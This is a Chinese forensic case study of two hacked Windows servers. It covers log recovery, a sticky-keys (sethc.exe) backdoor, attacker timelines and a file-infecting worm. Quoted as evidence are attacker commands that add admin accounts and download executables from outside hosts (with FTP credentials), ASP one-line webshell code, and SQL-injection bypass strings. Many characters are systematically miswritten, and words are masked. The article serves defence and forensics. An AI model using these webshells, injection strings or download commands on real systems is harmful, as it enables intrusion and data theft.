安全专家：真实的网络***取证纪实

诚信网安－－子明

【51CTO.com 专家特稿】随着信息技术的发展，愈来愈多的人都喜欢用计算机办公，发邮件，建设本身的个 人站点，公司创建本身的企业站点，政府也逐渐的采起了网上办公，更好的为人民服务，银行和证券机构也都开始依托互联网来进行金融和股票交易，可是随着方便 的同时也同时带来了新的一些计算机网络安全隐患，随着司法机关的介入，我相信在不久的未来，网络***调查取证也会成为立法机构必需要考虑设立的一门新的学 科，目前来讲开设这个的课程多在网络警察和一些特殊机关，如今我来给你们讲下我亲身经历并参与完成的一次取证过程，用事实来说述；

我一直从事病毒分析，网络***响应相关的工做，此次应好朋友的邀请，帮忙配合去协查几台服务器，咱们来到了某XXX驻地，首先进行例行检查。通过了 1天左右的时间的检查，其中用到了一些专用设备也包含自主编写的工具以及第三方提供的勘察取证软件，共发现问题主机服务器10台，其中2台比较严重，（以 下用A服务器和B服务器来代替）和朋友商定后，决定带回咱们的实验室，进行专项深刻分析。

习惯的检查步骤操做：

服务器操做系统版本信息——>操做系统补丁安装状况——>操做系统安装时间，中间有没有通过进行从新安装——>服务器维护状况——>服务器上面安装的软件版本信息

日志检查——IDS日志信息/IIS日志信息/系统日志信息
网站代码审查——是否存在一句话***，源代码上是否存在恶意代码插入
杀毒软件版本更新状况——是不是最新版本，配置的是否合理，配套的监视是否所有打开
数据恢复——>利用专用数据恢复软件进行数据恢复，恢复一些被删除的日志信息和系统信息，曾经安装过的文件操做信息。
提取可疑文件（病毒、***、后门、恶意广告插件）——在系统文件目录利用第三方或者自开发软件，对可疑文件进行提取并进行深度分析。

上述步骤是我我的总结的，有不妥的地方还请朋友们指正，介绍完理论，咱们来实践处理下这两台服务器。

A服务器检查处理过程

该A服务器所装的操做系统是Advanced 2000 server，服务器上安装的有瑞星2008杀毒软件，病毒库已经更新到最新版本。可是并无安装网络防火墙和其余系统监视软件，安装的ftp服务器版本为server-u 6.0（存在溢出***的威胁）

一 对原始数据进行恢复
利用Datarecover软件来恢复一些被删除的文件,目的是但愿从被删除的 文件来找出一些***或者后门以及病毒。进行深度分析，把曾经作过的格式化，以及在回收站中删除过的文件恢复过来，可是遗憾的是成功拿下这台服务器权限的黑 客已经作了专业处理，把他的一些痕迹进行了全面清理，我的认为他使用了日本地下***组织开发的专项日志清除工具，通过我和助手的共同努力仍是把系统日志恢 复到当年5月份。

二 手工分析可疑文件
在本服务器的c盘根目录下面有一个sethc..exe 文件。这个文件是微软自带的，是系统粘制键，真实的大小应为27kb，而这个文件为270kb，起初我觉得是因为打补丁的缘由。可是通过翻阅一些资料和作 比对以后，才知道这样的文件是一个新开发的流行后门，主要用法：经过3389终端，而后经过5次敲击shift键，直接调用sethc.exe而直接取得 系统权限。随后达到控制整个服务器，一般他仍是经过删除正常的一些c盘exe文件。而后把本身伪形成那个所删除的exe文件名。形成一种假象。

这里咱们提供解决方法以下：我的建议这个功能实用性并不高，建议直接删除这个文件，若是有人利用这个手法来对你的服务器进行***，那就确定是有人作了手脚，能够第一时间发现******行为，也能够做为取证分析的一个思路；在控制面板的辅助功能里面设置取消粘制键。

3、 利用专用防火墙检查工具去查看网络链接状况
目的是经过抓数据包来找出问题。若是对方安装的有远程控制终端，他确定须要让保存在服务器上的后门和控制终端进行通话，会有一个会话链接。经过防火墙的拦截功能而去寻找出控制的源头。这个上面没有发现存在反弹***，因此没有看到***的源头。

4、检查系统日志
做用：检查系统日志是否被***者清除，若是日志被***者删除，须要用数据恢复软件恢复操做系统日志
检查内容：主要包括IIS日志，安全性日志，系统日志。

更近一步深刻检查：
找到日志后，仔细分析网站是否有***者留下的webshell,尤为是一句话后门
根据Webshell的名字， 在IIS 访问日志里搜索相关的名字，找到***者经常使用的ip地址，分析ip地址
还能够根据此IP地址检索IIS日志中，此***者都进行过什么样的操做
技术点滴：若是你比较熟悉Webshell，经过Get操做能够知道***者都进行过何种操做。由于Get操做是被系统记录的。

若是***者装有系统级的后门，用经常使用工具好比冰刃(IceSword),System Repair Engineer (SREng)等分析出可疑文件，用其余调试工具分析找到***者控制端IP地址。

经过服务器日志查出隐藏在后面的幕后***
经过iis的log访问日志，排查出三个可疑目标，其中一个手法相对于后两个***者更熟练一些，他 在今年5月份左右或者更早就拿到了该服务器权限，上来以后到是没有作任何的添加和修改，从技术上来看，他是经过寻找网站的注入点进来的，而后在上面放了不 少的后门，还放了一个mm.exe的文件，可是由于技术问题，没有把这个马运行起来，从外部访问只是在主页上显示为mm.jpeg，假装成了图片。可是打 开之后，什么都没有。通过咱们分析之后，它是一张裸女的jpeg文件。若是他这个mm.exe成功，彻底有可能将该主站页面换成一张×××。危害仍是有 的。另外该站点权限给的太高，在访问新闻频道的时候，直接就是sa权限。这个是最高系统级和Admin是一个级别的。

因为服务器被网管人员从新装过，初步怀疑是用的ghost安装的，形成了原珍贵日志数据没法找回，咱们只能分析出7月份-12月份这段时间的日志，经过这些日志咱们又发现了针对此站点的***记录。

***者操做再现：（******操做过程分析）

2007-07-15 14:51:53 61.184.107.206 添加管理用户 net localgroup administrator Cao$ /add
2007-07-15 15:08:56 61.184.107.206 写下载exe的vbs脚本 c:\admin.vbs 试图下载exe地址为： [url]http://www.dianqiji.com/pic/2007/0428/admin.exe[/url] 

2007-08-12 09:48:45 218.205.238.6 写入webshell小马:d:\ybcenter\gg3.asp shell里留的QQ:183037，以后此人频繁用此后门登录服务器

2007-08-25 08:03:15 218.28.24.118 曾访问他之前留下的操做数据库的webshell /system/unit/main.asp 此后门能够浏览到敏感数据库的信息
2007-08-25 08:12:45 218.28.24.118 写入另外一个webshell D:\ybcenter\ggsm.asp
以后，218.28.24.118用之前留下的功能比较全的webshell /Cnnsc.asp和/system/unit/Cnnsc.asp频繁操做服务器上文件
2007-11-11 14:23:23 218.28.24.118 用他曾经留下的操做数据库的后门/service/asp.asp访问敏感数据库的信息
2007-08-25 08:27:57 218.28.24.118  用他曾经留下的操做数据库的后门/system/unit/sql.asp访问敏感数据库的信息
2007-11-11 11:02:55 218.28.24.118 试图访问他曾经留下的操做数据库的后门/yb/in_main3.asp访问敏感数据库

2007-08-06 12:42:41 218.19.22.152 写下载脚本C:\down.vbs 下载的exe为 [url]http://ray8701.3322.org/1.exe[/url]

2007-08-09 11:57:16 218.19.98.147 写ftp下载exe的脚本c:\zxq.txt ftp服务器203.253.31.244 用户名kick1000 密码84460965 下载1.exe
2007-08-26 07:43:47 123.5.57.117 试图***服务器
2007-08-26 07:43:47 123.5.57.117 写ftp下载exe的脚本c:\zxq.txt ftp服务器203.253.31.244 用户名kick1000 密码84460965 下载1.exe

2007-12-10 12:41:34 123.52.18.141 检测注入

5、查看登录信息  查看是否存在有克隆账户。
方法：检查注册表里面的sam文件有没有相同的fv，在这里检查过程当中没有发现存在有克隆账号。

6、查看系统安装日志，在这里并未发现问题。

7、 查看IIS访问日志，在这里发现了***者信息。
2007-12-01 08:55:16 220.175.79.231 检测注入
2007-12-03 18:40:48 218.28.68.126 检测注入
2007-12-04 01:31:32 218.28.192.90 检测注入，扫描web目录
2007-12-04 23:23:33 221.5.55.76  检测注入
2007-12-05 09:20:57 222.182.140.71 检测注入
2007-12-08 09:39:53 218.28.220.154 检测注入
2007-12-08 21:31:44 123.5.197.40 检测注入
2007-12-09 05:32:14 218.28.246.10 检测注入
2007-12-09 08:47:43 218.28.192.90 检测注入
2007-12-09 16:50:39 61.178.89.229 检测注入
2007-12-10 05:50:24 58.54.98.40  检测注入

定位可疑IP地址，追踪来源 查出IP地址的信息。

8、查看网站首页的源代码，在iframe 这个位置查看是否有不属于该网站的网站信息。（查找 网马的方法），以及如何发现一些潜在的***和网络可利用漏洞。
下面是咱们获得的一些他的网马。

gg3.asp Q:183637 log.asp pigpot.asp webdown.vbs attach/a.gif attach/chongtian.gif attach/111.rar system/unit/yjh.asp system/unit/conn.asp 加入防注入 Q:6242889678 p_w_picpaths/mm.jpg = exe自解压 主页包含文件

一句话***：<%execute request %>
备份一句话*** <%eval(request("a"):response.end%>
注射检查，在IIS里面查找是否存在的有针对  %20 and 1=1’sql
'or'='or' a'or'1=1--  ,'or1=1-- ,"or1=1-- ,or1=1--, 'or'a'='a, "or"="a'='a等
做用：躲避验证信息  主要用在后台登录上

%5c 爆数据库，做用直接下载服务器上的数据库，得到用户名和密码，通过系统提权而拿到整个服务器权限。
针对一些下载者这样的*** ，主要须要在windows /document and setting下面的local  setting 的 temp 或者 temp internet的这个文件夹中查看刚生成的exe文件，重点查看一下在system32文件夹下面的exe文件，尤为关注最新生成的exe文件，伪造的 系统文件等。

以上就是针对A服务器的整个检查过程以及发现问题后该如何处理和补救的相关解决方法。

B服务器检查取证分析

B服务器装的是windows2000　server版本，操做步骤同上。

通过一段细心的检查仍是让我和助手们发现了一个***，原由是在网站源代码处发现都被插入了一些奇怪的代码，在system32系统文件夹下还发现了新的niu.exe,很是可疑，提取该exe文件，在虚拟机中进行分析，得出该exe工做原理：

该exe属***类，病毒运行后判断当前运行文件的文件路径若是不是%System32%\SVCH0ST.EXE，将打开当前文件的所在目录复制自 身到%System32%下，改名为SVSH0ST.EXE，并衍生autorun.inf文件；复制自身到全部驱动器根目录下，改名为niu.exe， 并衍生autorun.inf文件，实现双击打开驱动器时，自动运行病毒文件；遍历全部驱动器，在htm、asp、aspx、php、html、jsp格 式文件的尾部插入96个字节的病毒代码；遍历磁盘删除以GHO为扩展名的文件，使用户没法进行系统还原；链接网络下载病毒文件；修改系统时间为2000 年；病毒运行后删除自身。

以上是我配合有关部门参与的真实的一次的取证记录，由于答应过朋友要保守秘密，因此真实的一些ip地址和信息这里都作保留。同时在这里我要感谢安天cert组的战友的帮忙，以及身边的2个助手的并肩做战。